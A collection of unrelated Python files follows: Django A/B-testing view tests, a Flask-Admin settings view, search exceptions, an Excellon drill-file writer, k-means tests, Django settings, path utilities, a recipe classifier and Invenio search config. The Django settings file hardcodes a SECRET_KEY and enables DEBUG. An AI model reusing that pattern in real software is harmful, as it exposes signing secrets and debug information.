            reverse("ab_testing_tool_submit_edit_experiment", args=(experiment.id,)),
            follow=True, content_type="application/json", data=json.dumps(experiment_json)
        )
        self.assertOkay(response)
        experiment = Experiment.objects.get(id=experiment.id)
        self.assertEquals(experiment.assignment_method, Experiment.WEIGHTED_PROBABILITY_RANDOM)
        self.assertEquals(experiment.tracks.count(), track_count)
        track1 = experiment.tracks.get(id=track1.id)
        track2 = experiment.tracks.get(id=track2.id)
        self.assertEquals(track1.name, "C") #Checks name has changed
        self.assertEquals(track2.name, "D")
        self.assertEquals(track1.weight.weighting, 30) #Checks weighting has changed
        self.assertEquals(track2.weight.weighting, 70)
    
    def test_delete_experiment(self):
        """ Tests that delete_experiment method properly deletes a experiment when authorized"""
        first_num_experiments = Experiment.objects.count()
        experiment = self.create_test_experiment()
        self.assertEqual(first_num_experiments + 1, Experiment.objects.count())
        response = self.client.post(reverse("ab_testing_tool_delete_experiment", args=(experiment.id,)),
                                    follow=True)
        second_num_experiments = Experiment.objects.count()
        self.assertOkay(response)
        self.assertEqual(first_num_experiments, second_num_experiments)
    
    def test_delete_experiment_already_finalized(self):
        """ Tests that delete experiment doesn't work when experiments are finalized """
        experiment = self.create_test_experiment()
        # NOTE(review): Django model instances have no update() method by
        # default; presumably Experiment (or a test mixin) defines one that
        # assigns and saves -- confirm, otherwise this raises AttributeError.
        experiment.update(tracks_finalized=True)
        first_num_experiments = Experiment.objects.count()
        response = self.client.post(reverse("ab_testing_tool_delete_experiment", args=(experiment.id,)),
                                    follow=True)
        second_num_experiments = Experiment.objects.count()
        self.assertError(response, EXPERIMENT_TRACKS_ALREADY_FINALIZED)
        self.assertEqual(first_num_experiments, second_num_experiments)
    
    @patch(LIST_MODULES, return_value=APIReturn([{"id": 0}]))
    def test_delete_experiment_has_installed_intervention_point(self, _mock1):
        """ Tests that delete experiment doesn't work when there is an associated
            intervention point is installed """
        # _mock1 is the MagicMock injected by the @patch decorator (unused).
        experiment = self.create_test_experiment()
        first_num_experiments = Experiment.objects.count()
        ret_val = [True]
        with patch("ab_tool.canvas.CanvasModules.experiment_has_installed_intervention",
                   return_value=ret_val):
            response = self.client.post(reverse("ab_testing_tool_delete_experiment", args=(experiment.id,)),
                                        follow=True)
            second_num_experiments = Experiment.objects.count()
            self.assertError(response, INTERVENTION_POINTS_ARE_INSTALLED)
            self.assertEqual(first_num_experiments, second_num_experiments)
    
    def test_delete_experiment_unauthorized(self):
        """ Tests that delete_experiment method raises error when unauthorized """
        self.set_roles([])
        experiment = self.create_test_experiment()
        first_num_experiments = Experiment.objects.count()
        response = self.client.post(reverse("ab_testing_tool_delete_experiment", args=(experiment.id,)),
                                    follow=True)
        second_num_experiments = Experiment.objects.count()
        self.assertTemplateUsed(response, "ab_tool/not_authorized.html")
        self.assertEqual(first_num_experiments, second_num_experiments)
    
    def test_delete_experiment_nonexistent(self):
        """ Tests that delete_experiment method raises successfully redirects
            despite non-existent Experiment. This is by design, as the Http404
            is caught since multiple users may be editing the A/B dashboard on
            in the same course """
        self.create_test_experiment()
        t_id = NONEXISTENT_EXPERIMENT_ID
        first_num_experiments = Experiment.objects.count()
        response = self.client.post(reverse("ab_testing_tool_delete_experiment", args=(t_id,)), follow=True)
        second_num_experiments = Experiment.objects.count()
        self.assertEqual(first_num_experiments, second_num_experiments)
        self.assertOkay(response)
    
    def test_delete_experiment_wrong_course(self):
        """ Tests that delete_experiment method raises error for existent Experiment but for
            wrong course """
        experiment = self.create_test_experiment(course_id=TEST_OTHER_COURSE_ID)
        first_num_experiments = Experiment.objects.count()
        response = self.client.post(reverse("ab_testing_tool_delete_experiment", args=(experiment.id,)),
                                   follow=True)
        second_num_experiments = Experiment.objects.count()
        self.assertEqual(first_num_experiments, second_num_experiments)
        self.assertError(response, UNAUTHORIZED_ACCESS)
    
    def test_delete_experiment_deletes_intervention_point_urls(self):
        """ Tests that intervention_point_urls of a experiment are deleted when the experiment is """
        experiment = self.create_test_experiment()
        track1 = self.create_test_track(name="track1", experiment=experiment)
        track2 = self.create_test_track(name="track2", experiment=experiment)
        intervention_point = self.create_test_intervention_point()
        InterventionPointUrl.objects.create(intervention_point=intervention_point,
                                            track=track1, url="example.com")
        InterventionPointUrl.objects.create(intervention_point=intervention_point,
                                            track=track2, url="example.com")
        first_num_intervention_point_urls = InterventionPointUrl.objects.count()
        response = self.client.post(reverse("ab_testing_tool_delete_experiment", args=(experiment.id,)),
                                    follow=True)
        second_num_intervention_point_urls = InterventionPointUrl.objects.count()
        self.assertOkay(response)
        self.assertEqual(first_num_intervention_point_urls - 2, second_num_intervention_point_urls)
    
    def test_finalize_tracks(self):
        """ Tests that the finalize tracks page sets the appropriate course """
        experiment = Experiment.get_placeholder_course_experiment(TEST_COURSE_ID)
        self.assertFalse(experiment.tracks_finalized)
        self.create_test_track()
        response = self.client.post(reverse("ab_testing_tool_finalize_tracks", args=(experiment.id,)),
                                    follow=True)
        self.assertOkay(response)
        experiment = Experiment.get_placeholder_course_experiment(TEST_COURSE_ID)
        self.assertTrue(experiment.tracks_finalized)
    
    def test_finalize_tracks_missing_urls(self):
        """ Tests that finalize fails if there are missing urls """
        experiment = Experiment.get_placeholder_course_experiment(TEST_COURSE_ID)
        self.assertFalse(experiment.tracks_finalized)
        track1 = self.create_test_track(name="track1", experiment=experiment)
        self.create_test_track(name="track2", experiment=experiment)
        intervention_point = self.create_test_intervention_point()
        # Only track1 gets a URL; track2's missing URL should block finalize.
        InterventionPointUrl.objects.create(intervention_point=intervention_point,
                                            track=track1, url="example.com")
        response = self.client.post(reverse("ab_testing_tool_finalize_tracks", args=(experiment.id,)), follow=True)
        self.assertOkay(response)
        experiment = Experiment.get_placeholder_course_experiment(TEST_COURSE_ID)
        self.assertFalse(experiment.tracks_finalized)
    
    def test_finalize_tracks_no_tracks(self):
        """ Tests that finalize fails if there are no tracks for an experiment """
        experiment = Experiment.get_placeholder_course_experiment(TEST_COURSE_ID)
        response = self.client.post(reverse("ab_testing_tool_finalize_tracks", args=(experiment.id,)),
                                    follow=True)
        self.assertError(response, NO_TRACKS_FOR_EXPERIMENT)
    
    def test_finalize_tracks_missing_track_weights(self):
        """ Tests that finalize fails if there are no track weights for an weighted
            probability experiment """
        experiment = self.create_test_experiment(assignment_method=Experiment.WEIGHTED_PROBABILITY_RANDOM)
        self.create_test_track(name="track1", experiment=experiment)
        response = self.client.post(reverse("ab_testing_tool_finalize_tracks", args=(experiment.id,)), follow=True)
        self.assertOkay(response)
        self.assertFalse(experiment.tracks_finalized)
    
    def test_copy_experiment(self):
        """ Tests that copy_experiment creates a new experiment """
        experiment = self.create_test_experiment()
        num_experiments = Experiment.objects.count()
        url = reverse("ab_testing_tool_copy_experiment", args=(experiment.id,))
        response = self.client.post(url, follow=True)
        self.assertOkay(response)
        self.assertEqual(Experiment.objects.count(), num_experiments + 1)
    
    def test_copy_experiment_unauthorized(self):
        """ Tests that copy_experiment fails when unauthorized """
        self.set_roles([])
        experiment = self.create_test_experiment()
        url = reverse("ab_testing_tool_copy_experiment", args=(experiment.id,))
        response = self.client.post(url, follow=True)
        self.assertTemplateUsed(response, "ab_tool/not_authorized.html")
    
    def test_copy_experiment_inavlid_id(self):
        """ Tests that copy_experiment fails with bad experiment_id """
        url = reverse("ab_testing_tool_copy_experiment", args=(12345,))
        response = self.client.post(url, follow=True)
        self.assertEquals(response.status_code, 404)
    
    def test_copy_experiment_wrong_course(self):
        """ Tests that copy_experiment fails if experiment is different coruse """
        experiment = self.create_test_experiment(course_id=TEST_OTHER_COURSE_ID)
        url = reverse("ab_testing_tool_copy_experiment", args=(experiment.id,))
        response = self.client.post(url, follow=True)
        self.assertError(response, UNAUTHORIZED_ACCESS)
    
    def test_delete_track(self):
        """ Tests that delete_track method properly deletes a track of an experiment when authorized"""
        experiment = self.create_test_experiment()
        track = self.create_test_track(experiment=experiment)
        self.assertEqual(experiment.tracks.count(), 1)
        response = self.client.post(reverse("ab_testing_tool_delete_track", args=(track.id,)),
                                    follow=True)
        self.assertEqual(experiment.tracks.count(), 0)
        self.assertOkay(response)
    
    def test_delete_nonexistent_track(self):
        """ Tests that delete_track method succeeds, by design, when deleting a nonexistent track"""
        experiment = self.create_test_experiment()
        self.assertEqual(experiment.tracks.count(), 0)
        response = self.client.post(reverse("ab_testing_tool_delete_track", args=(NONEXISTENT_TRACK_ID,)),
                                    follow=True)
        self.assertEqual(experiment.tracks.count(), 0)
        self.assertOkay(response)

#-*- coding: utf-8 -*-

from flask import current_app, flash, url_for, request
from flask_admin import expose, BaseView

from logpot.admin.base import AuthenticateView, flash_errors
from logpot.admin.forms import SettingForm
from logpot.utils import ImageUtil, getDirectoryPath, loadSiteConfig, saveSiteConfig

import os
from PIL import Image

class SettingView(AuthenticateView, BaseView):
    """Administration view for editing and persisting site-wide settings."""

    # (site-config key, SettingForm field name) pairs used to copy values
    # between the persisted configuration and the form in both directions.
    _CONFIG_FIELDS = (
        ('site_title', 'title'),
        ('site_subtitle', 'subtitle'),
        ('site_author', 'author'),
        ('site_author_profile', 'author_profile'),
        ('enable_link_github', 'enable_link_github'),
        ('enable_profile_img', 'enable_profile_img'),
        ('ogp_app_id', 'ogp_app_id'),
        ('ga_tracking_id', 'ga_tracking_id'),
        ('enable_twittercard', 'enable_twittercard'),
        ('twitter_username', 'twitter_username'),
        ('display_poweredby', 'display_poweredby'),
    )

    def saveProfileImage(self, filestorage):
        """Crop the uploaded image to 64px and save it as profile.png.

        :param filestorage: the uploaded file (has a ``.stream`` attribute)
        """
        stream = filestorage.stream  # renamed: ``buffer`` shadows a builtin
        stream.seek(0)
        image = Image.open(stream)
        image = ImageUtil.crop_image(image, 64)
        current_app.logger.info(image)
        dirpath = getDirectoryPath(current_app, '_settings')
        filepath = os.path.join(dirpath, "profile.png")
        image.save(filepath, optimize=True)

    @expose('/', methods=('GET','POST'))
    def index(self):
        """Render the settings form; on valid POST, persist the settings."""
        form = SettingForm()

        if form.validate_on_submit():
            if form.profile_img.data:
                self.saveProfileImage(form.profile_img.data)

            # Collect every configured field off the validated form.
            data = {key: getattr(form, field).data
                    for key, field in self._CONFIG_FIELDS}
            if saveSiteConfig(current_app, data):
                flash('Successfully saved.')
            else:
                # BUG FIX: flash_errors() expects a form object (see the
                # validation branch below); use flash() for a plain message.
                flash('Oops. Save error.')
        else:
            flash_errors(form)

        # Re-populate the form from the stored configuration so the page
        # always reflects what is actually persisted.
        data = loadSiteConfig(current_app)
        for key, field in self._CONFIG_FIELDS:
            getattr(form, field).data = data[key]
        return self.render('admin/setting.html', form=form)

# TODO When raising an exception pass a lambda function, the function being the module/path/name thing

# Maps HTTP status codes to error-message templates; the '{0}' placeholder
# is filled with the offending status code.  'default' is the fallback for
# codes not listed here.
ERROR = {'default': "Unknown engine error ({0})",
         400: "Bad request sent to search API ({0})",
         401: "Incorrect API Key ({0})",
         403: "Correct API but request refused ({0})",
         404: "Bad request sent to search API ({0})"}


class SearchException(Exception):
    """
    Base class for all ifind search exceptions.

    The raising module's name is prefixed onto the message so the
    origin of the error is always visible.

    """
    def __init__(self, module, message):
        """
        Build the exception, prefixing *module* onto *message*.

        Args:
            module (str): name of the module/class raising the exception
            message (str): error description to be displayed

        Usage:
            raise SearchException("Test", "this is an error")

        """
        full_message = "{0} - {1}".format(module, message)
        super(SearchException, self).__init__(full_message)


class EngineConnectionException(SearchException):
    """
    Raised when an engine connectivity error occurs.
    If a status code is supplied, a code-specific message is generated.

    """
    def __init__(self, engine, message, code=None):
        """
        EngineException constructor.

        Args:
            engine (str): name of engine that's raising exception
            message (str): fallback message (usually ignored when code given)

        Kwargs:
            code (int): response status code of issued request

        Usage:
            raise EngineException("Bing", "", code=200)

        """
        self.code = code
        if code:
            # Look up a code-specific template, falling back to 'default'.
            template = ERROR.get(code, ERROR['default'])
            self.message = template.format(code)
        else:
            self.message = message

        SearchException.__init__(self, engine, self.message)


class EngineLoadException(SearchException):
    """Raised when an engine cannot be dynamically loaded."""


class EngineAPIKeyException(SearchException):
    """Raised when an engine's API key hasn't been provided."""


class QueryParamException(SearchException):
    """Raised when query parameters are incompatible or missing."""


class CacheConnectionException(SearchException):
    """Raised when a cache connectivity error occurs."""


class InvalidQueryException(SearchException):
    """Raised when an invalid query is passed to an engine's search method."""


class RateLimitException(SearchException):
    """Raised when an engine's request rate limit has been exceeded."""
#!/usr/bin/python

import os
import re
from lxml import etree as et

import pcbmode.config as config
from . import messages as msg

# pcbmode modules
from . import utils
from .point import Point



def makeExcellon(manufacturer='default'):
    """
    Generate an Excellon drill file for the board and write it into the
    production build directory, using the given manufacturer's filename
    conventions.
    """

    ns = {'pcbmode': config.cfg['ns']['pcbmode'],
          'svg': config.cfg['ns']['svg']}

    # Pull the drills layer out of the board's SVG
    svg_in = utils.openBoardSVG()
    drills_layer = svg_in.find("//svg:g[@pcbmode:sheet='drills']",
                               namespaces=ns)

    excellon = Excellon(drills_layer)

    # Output path: <build>/production/<name>_rev_<rev>_drills.<ext>
    base_dir = os.path.join(config.cfg['base-dir'],
                            config.cfg['locations']['build'],
                            'production')
    base_name = "%s_rev_%s" % (config.brd['config']['name'],
                               config.brd['config']['rev'])

    filename_info = config.cfg['manufacturers'][manufacturer]['filenames']['drills']

    # Fall back to a .txt extension when none is configured
    extension = filename_info['plated'].get('ext') or 'txt'
    suffix = '_%s.%s' % ('drills', extension)
    output_path = os.path.join(base_dir, base_name + suffix)

    with open(output_path, "wb") as f:
        for line in excellon.getExcellon():
            f.write(line)





class Excellon():
    """
    Builds an Excellon drill program from the drill paths found in a
    board SVG layer.
    """

    def __init__(self, svg):
        """
        Collect drill locations per diameter from *svg* and assemble the
        preamble, content and postamble of the Excellon program.
        """

        self._svg = svg

        self._ns = {'pcbmode': config.cfg['ns']['pcbmode'],
                    'svg': config.cfg['ns']['svg']}

        # Get all drill paths except for the ones used in the drill-index
        drill_paths = self._svg.findall(
            ".//svg:g[@pcbmode:type='component-shapes']//svg:path",
            namespaces=self._ns)

        diameter_attr = '{' + config.cfg['ns']['pcbmode'] + '}diameter'
        drills_dict = {}
        for drill_path in drill_paths:
            diameter = drill_path.get(diameter_attr)
            entry = drills_dict.setdefault(diameter, {'locations': []})
            entry['locations'].append(self._getLocation(drill_path))

        self._preamble = self._createPreamble()
        self._content = self._createContent(drills_dict)
        self._postamble = self._createPostamble()


    def getExcellon(self):
        """Return the complete Excellon program as a list of lines."""
        return self._preamble + self._content + self._postamble


    def _createContent(self, drills):
        """Emit the tool table followed by per-tool drill coordinates."""
        ex = []
        # Assign tool indices (must start at 1) while emitting the tool
        # table. Both loops below iterate `drills` in the same order, so
        # tool numbers and coordinate groups stay matched up.
        for i, diameter in enumerate(drills):
            drills[diameter]['index'] = i + 1
            ex.append("T%dC%s\n" % (i + 1, diameter))

        ex.append('M95\n')  # End of a part program header

        for diameter in drills:
            ex.append("T%s\n" % drills[diameter]['index'])
            ex.extend(self._getPoint(coord)
                      for coord in drills[diameter]['locations'])

        return ex


    def _createPreamble(self):
        """Program header."""
        return ['M48\n',        # Beginning of a part program header
                'METRIC,TZ\n',  # Metric, trailing zeros
                'G90\n',        # Absolute mode
                'M71\n']        # Metric measuring mode


    def _createPostamble(self):
        """Program trailer."""
        return ['M30\n']  # End of Program, rewind


    def _getLocation(self, path):
        """
        Returns the location of a path, factoring in all the transforms of
        its ancestors, and its own transform
        """

        location = Point()

        # Accumulate the transforms of every ancestor that has one so the
        # location comes out in board coordinates.
        for ancestor in path.xpath("ancestor::*[@transform]"):
            data = utils.parseTransform(ancestor.get('transform'))
            location += data['location']

        # Add the transform of the path itself
        own_transform = path.get('transform')
        if own_transform is not None:
            data = utils.parseTransform(own_transform)
            location += data['location']

        return location


    def _getPoint(self, point):
        """
        Converts a Point type into an Excellon coordinate (y is flipped).
        """
        return "X%.6fY%.6f\n" % (point.x, -point.y)




"""Run tests for the kmeans portion of the kmeans module"""

import kmeans.kmeans.kmeans as kmeans
import numpy as np
import random


def test_1dim_distance():
    """The euclidean distance of two scalars is their absolute difference."""
    a, b = random.random(), random.random()
    assert kmeans.ndim_euclidean_distance(a, b) == abs(a - b)


def test_ndim_distance():
    """Shifting one coordinate by 1 changes the distance by exactly 1.

    The result is rounded to an integer because floating-point arithmetic
    makes testing analytic functions a mess.
    """
    rand = random.random
    point1 = [rand() for _ in range(6)]
    point2 = [point1[0] + 1] + point1[1:]  # just shift x to the right by 1
    assert int(round(kmeans.ndim_euclidean_distance(point1, point2))) == 1


def test_maxiters():
    """Iteration must stop once the ceiling of 30 is reached or passed."""
    for iterations in (30, 31):
        assert kmeans.should_iter([], [], iterations=iterations) == False


def test_random_centroid_dimensions():
    """Every generated centroid has the requested number of dimensions."""
    dimensions = random.randrange(1, 100)
    k = random.randrange(1, 100)
    for centroid in kmeans.random_centroids(k, dimensions):
        assert len(centroid) == dimensions


def test_iterated_centroid():
    """The new centroid is the per-dimension average of its assigned points."""
    new_centroid = kmeans.iterated_centroid(
        [[1, 1, 1], [2, 2, 2]], [[100, 200, 300]], [(0, 0), (1, 0)])
    np.testing.assert_allclose(
        new_centroid, np.array([[1.5, 1.5, 1.5]]), rtol=1e-5)


"""
Django settings for ross project.

Generated by 'django-admin startproject' using Django 1.10.6.

For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/

For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""

import os

# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))


# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control; rotate it and load
# it from the environment before deploying anywhere public.
SECRET_KEY = 'jtn=n8&nq9jgir8_z1ck40^c1s22d%=)z5qsm*q(bku*_=^sg&'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

# Empty list: with DEBUG = True Django falls back to localhost-only hosts.
ALLOWED_HOSTS = []


# Application definition

# Only Django's stock contrib apps are installed; project apps are added here.
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
]

# Default middleware stack as generated by `startproject` (order matters).
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'ross.urls'

# Template engine: app template directories only (APP_DIRS), no project-level DIRS.
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'ross.wsgi.application'


# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases

# Development database: a single SQLite file in the project root.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}


# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]


# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/

LANGUAGE_CODE = 'en-us'

TIME_ZONE = 'UTC'

USE_I18N = True

USE_L10N = True

USE_TZ = True


# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/

STATIC_URL = '/static/'

import re
import hashlib

FNAME_MATCH = re.compile(r'/([^/]+)$')  # From the last slash to the end of the string
PREFIX = re.compile(r'([^:]+://)(/)?(.+)')  # Check for a prefix like data://


def getParentAndBase(path):
    """
    Split *path* into (parent, basename).

    Handles plain filesystem-style paths ('/a/b/c' -> ('/a/b', 'c'), one
    trailing slash stripped) and prefixed URIs ('data://a/b' ->
    ('data://a', 'b')), preserving an optional slash right after the prefix.

    Raises:
        ValueError: if a plain path contains no '/' separator.
    """
    match = PREFIX.match(path)
    if match is None:
        # Plain path: strip one trailing slash, then split on the last '/'.
        stripped_path = path[:-1] if path.endswith('/') else path
        base = FNAME_MATCH.search(stripped_path)
        if base is None:
            raise ValueError('Invalid path')
        parent = FNAME_MATCH.sub('', stripped_path)
        return parent, base.group(1)
    else:
        prefix, leading_slash, uri = match.groups()
        parts = uri.split('/')
        parent_path = '/'.join(parts[:-1])
        # Fix: the join above was previously computed and then immediately
        # overwritten in both branches below (dead store); compute it once.
        if leading_slash is not None:
            parent_path = '{prefix}/{parent}'.format(prefix=prefix, parent=parent_path)
        else:
            parent_path = '{prefix}{parent}'.format(prefix=prefix, parent=parent_path)
        return parent_path, parts[-1]


def pathJoin(parent, base):
    """Join *parent* and *base*, avoiding a doubled '/' separator."""
    separator = '' if parent.endswith('/') else '/'
    return parent + separator + base


def md5_for_file(fname):
    """Return the hex MD5 digest of the file at *fname*, read in 4 KiB chunks."""
    digest = hashlib.md5()
    with open(fname, "rb") as f:
        while True:
            chunk = f.read(4096)
            if not chunk:
                break
            digest.update(chunk)
    return str(digest.hexdigest())


def md5_for_str(content):
    """Return the hex MD5 digest of *content* encoded with the default codec."""
    return str(hashlib.md5(content.encode()).hexdigest())

"""
train supervised classifier with what's cooking recipe data
objective - determine recipe type categorical value from 20
"""
import time
from features_bow import *
from features_word2vec import *
from sklearn.preprocessing import StandardScaler
from sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier
from sklearn.linear_model import SGDClassifier
from sklearn.cross_validation import cross_val_score


""" main entry method """
def main(use_idf=False, random_state=None, std=False, n_jobs=-1, verbose=2):
    """Train and cross-validate a random-forest cuisine classifier on
    What's Cooking recipe data.

    Kwargs:
        use_idf: weight word2vec features by per-ingredient inverse
            document frequencies.
        random_state: seed for the random forest (None = nondeterministic).
        std: standardize features (mean ~0, std ~1) before training.
        n_jobs: parallelism for the forest (-1 = all cores).
        verbose: verbosity passed through to feature builders/classifier.
    """
    wc_idf_map = None
    if use_idf:
        # ingredients inverse document frequencies
        wc_components = build_tfidf_wc(verbose=(verbose > 0))
        wc_idf = wc_components['model'].idf_
        wc_idf_words = wc_components['model'].get_feature_names()
        # map each ingredient token to its idf weight
        wc_idf_map = dict(zip(wc_idf_words, wc_idf))
    # word2vec recipe feature vectors
    wc_components = build_word2vec_wc(feature_vec_size=120, avg=True, idf=wc_idf_map, verbose=(verbose > 0))
    y_train = wc_components['train']['df']['cuisine_code'].as_matrix()
    X_train = wc_components['train']['features_matrix']
    # standardize features aka mean ~ 0, std ~ 1
    if std:
        scaler = StandardScaler()
        scaler.fit(X_train)
        X_train = scaler.transform(X_train)
    # random forest supervised classifier
    time_0 = time.time()
    clf = RandomForestClassifier(n_estimators=100, max_depth=None,
        n_jobs=n_jobs, random_state=random_state, verbose=verbose)
    # perform cross validation (the classifier is cloned and fit per fold)
    cv_n_fold = 8
    print 'cross validating %s ways...' % cv_n_fold
    scores_cv = cross_val_score(clf, X_train, y_train, cv=cv_n_fold, n_jobs=-1)
    print 'accuracy: %0.5f (+/- %0.5f)' % (scores_cv.mean(), scores_cv.std() * 2)
    time_1 = time.time()
    elapsed_time = time_1 - time_0
    print 'cross validation took %.3f seconds' % elapsed_time


if __name__ == '__main__':
    # Run with default options when executed as a script.
    main()

# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.

"""Configuration options for Invenio-Search.

The documentation for the configuration is in docs/configuration.rst.
"""

#
# ELASTIC configuration
#

# Client-level options forwarded verbatim to the Elasticsearch constructor.
SEARCH_CLIENT_CONFIG = None
"""Dictionary of options for the Elasticsearch client.

The value of this variable is passed to :py:class:`elasticsearch.Elasticsearch`
as keyword arguments and is used to configure the client. See the available
keyword arguments in the two following classes:

- :py:class:`elasticsearch.Elasticsearch`
- :py:class:`elasticsearch.Transport`

If you specify the key ``hosts`` in this dictionary, the configuration variable
:py:class:`~invenio_search.config.SEARCH_ELASTIC_HOSTS` will have no effect.
"""

SEARCH_ELASTIC_HOSTS = None  # default localhost
"""Elasticsearch hosts.

By default, Invenio connects to ``localhost:9200``.

The value of this variable is a list of dictionaries, where each dictionary
represents a host. The available keys in each dictionary is determined by the
connection class:

- :py:class:`elasticsearch.connection.Urllib3HttpConnection` (default)
- :py:class:`elasticsearch.connection.RequestsHttpConnection`

You can change the connection class via the
:py:class:`~invenio_search.config.SEARCH_CLIENT_CONFIG`. If you specified the
``hosts`` key in :py:class:`~invenio_search.config.SEARCH_CLIENT_CONFIG` then
this configuration variable will have no effect.
"""


SEARCH_MAPPINGS = None  # loads all mappings and creates aliases for them
"""List of aliases for which, their search mappings should be created.

- If `None` all aliases (and their search mappings) defined through the
  ``invenio_search.mappings`` entry point in setup.py will be created.
- Provide an empty list ``[]`` if no aliases (or their search mappings)
  should be created.

For example if you don't want to create aliases
and their mappings for `authors`:

.. code-block:: python

    # in your `setup.py` you would specify:
    entry_points={
        'invenio_search.mappings': [
            'records = invenio_foo_bar.mappings',
            'authors = invenio_foo_bar.mappings',
        ],
    }

    # and in your config.py
    SEARCH_MAPPINGS = ['records']
"""

SEARCH_RESULTS_MIN_SCORE = None
"""If set, the `min_score` parameter is added to each search request body.

The `min_score` parameter excludes results which have a `_score` less than
the minimum specified in `min_score`.

Note that the `max_score` varies depending on the number of results for a given
search query and it is not absolute value. Therefore, setting `min_score` too
high can lead to 0 results because it can be higher than any result's `_score`.

Please refer to `Elasticsearch min_score documentation
<https://www.elastic.co/guide/en/elasticsearch/reference/current/
search-request-min-score.html>`_ for more information.
"""

# Empty string means no prefixing; set per-instance (e.g. 'dev-', 'prod-').
SEARCH_INDEX_PREFIX = ''
"""Any index, alias and templates will be prefixed with this string.

Useful to host multiple instances of the app on the same Elasticsearch cluster,
for example on one app you can set it to `dev-` and on the other to `prod-`,
and each will create non-colliding indices prefixed with the corresponding
string.

Usage example:

.. code-block:: python

    # in your config.py
    SEARCH_INDEX_PREFIX = 'prod-'

For templates, ensure that the prefix `__SEARCH_INDEX_PREFIX__` is added to
your index names. This pattern will be replaced by the prefix config value.

Usage example in your template.json:

.. code-block:: json

    {
        "index_patterns": ["__SEARCH_INDEX_PREFIX__myindex-name-*"]
    }
"""

from __future__ import unicode_literals

from django.apps import AppConfig


class RfhistoryConfig(AppConfig):
    """Django application configuration for the RFHistory app."""
    # Full Python path of the application; used by Django's app registry.
    name = 'RFHistory'

import unittest
from polycircles import polycircles
from nose.tools import assert_equal, assert_almost_equal


class TestDifferentOutputs(unittest.TestCase):
    """Tests the various output methods: KML style, WKT, lat-lon and lon-lat."""

    def setUp(self):
        # A fixed circle around a known coordinate, reused by every test.
        self.latitude = 32.074322
        self.longitude = 34.792081
        self.radius_meters = 100
        self.number_of_vertices = 36
        self.polycircle = polycircles.Polycircle(
            latitude=self.latitude,
            longitude=self.longitude,
            radius=self.radius_meters,
            number_of_vertices=self.number_of_vertices)

    def test_lat_lon_output(self):
        """Each vertex of to_lat_lon() lists latitude first, then longitude."""
        for vertex in self.polycircle.to_lat_lon():
            assert_almost_equal(vertex[0], self.latitude, places=2)
            assert_almost_equal(vertex[1], self.longitude, places=2)

    def test_lon_lat_output(self):
        """Each vertex of to_lon_lat() lists longitude first, then latitude."""
        for vertex in self.polycircle.to_lon_lat():
            assert_almost_equal(vertex[0], self.longitude, places=2)
            assert_almost_equal(vertex[1], self.latitude, places=2)

    def test_vertices_equals_lat_lon(self):
        """The "vertices" property is identical to the return value of
        to_lat_lon()."""
        assert_equal(self.polycircle.vertices, self.polycircle.to_lat_lon())

    def test_kml_equals_lon_lat(self):
        """The return value of to_kml() is identical to the return value of
        to_lon_lat()."""
        assert_equal(self.polycircle.to_kml(), self.polycircle.to_lon_lat())

if __name__ == '__main__':
    # Allow running this test module directly with `python <file>`.
    unittest.main()
# coding: utf-8

""" General utilities. """

from __future__ import division, print_function

__author__ = "adrn <adrn@astro.columbia.edu>"

# Standard library
import collections
import sys
import logging
import multiprocessing

# Third-party
import numpy as np

__all__ = ['get_pool']

# Create logger
logger = logging.getLogger(__name__)

class SerialPool(object):

    def close(self):
        return

    def map(self, *args, **kwargs):
        return map(*args, **kwargs)

def get_pool(mpi=False, threads=None):
    """ Get a pool object to pass to emcee for parallel processing.
        If mpi is False and threads is None, pool is None.

        Parameters
        ----------
        mpi : bool
            Use MPI or not. If specified, ignores the threads kwarg.
        threads : int (optional)
            If mpi is False and threads is specified, use a Python
            multiprocessing pool with the specified number of threads.
    """

    if mpi:
        from emcee.utils import MPIPool

        # Initialize the MPI pool
        pool = MPIPool()

        # Make sure the thread we're running on is the master
        if not pool.is_master():
            pool.wait()
            sys.exit(0)
        logger.debug("Running with MPI...")

    elif threads > 1:
        logger.debug("Running with multiprocessing on {} cores..."
                     .format(threads))
        pool = multiprocessing.Pool(threads)

    else:
        logger.debug("Running serial...")
        pool = SerialPool()

    return pool

def gram_schmidt(y):
    """ Modified Gram-Schmidt orthonormalization of the matrix y(n,n).
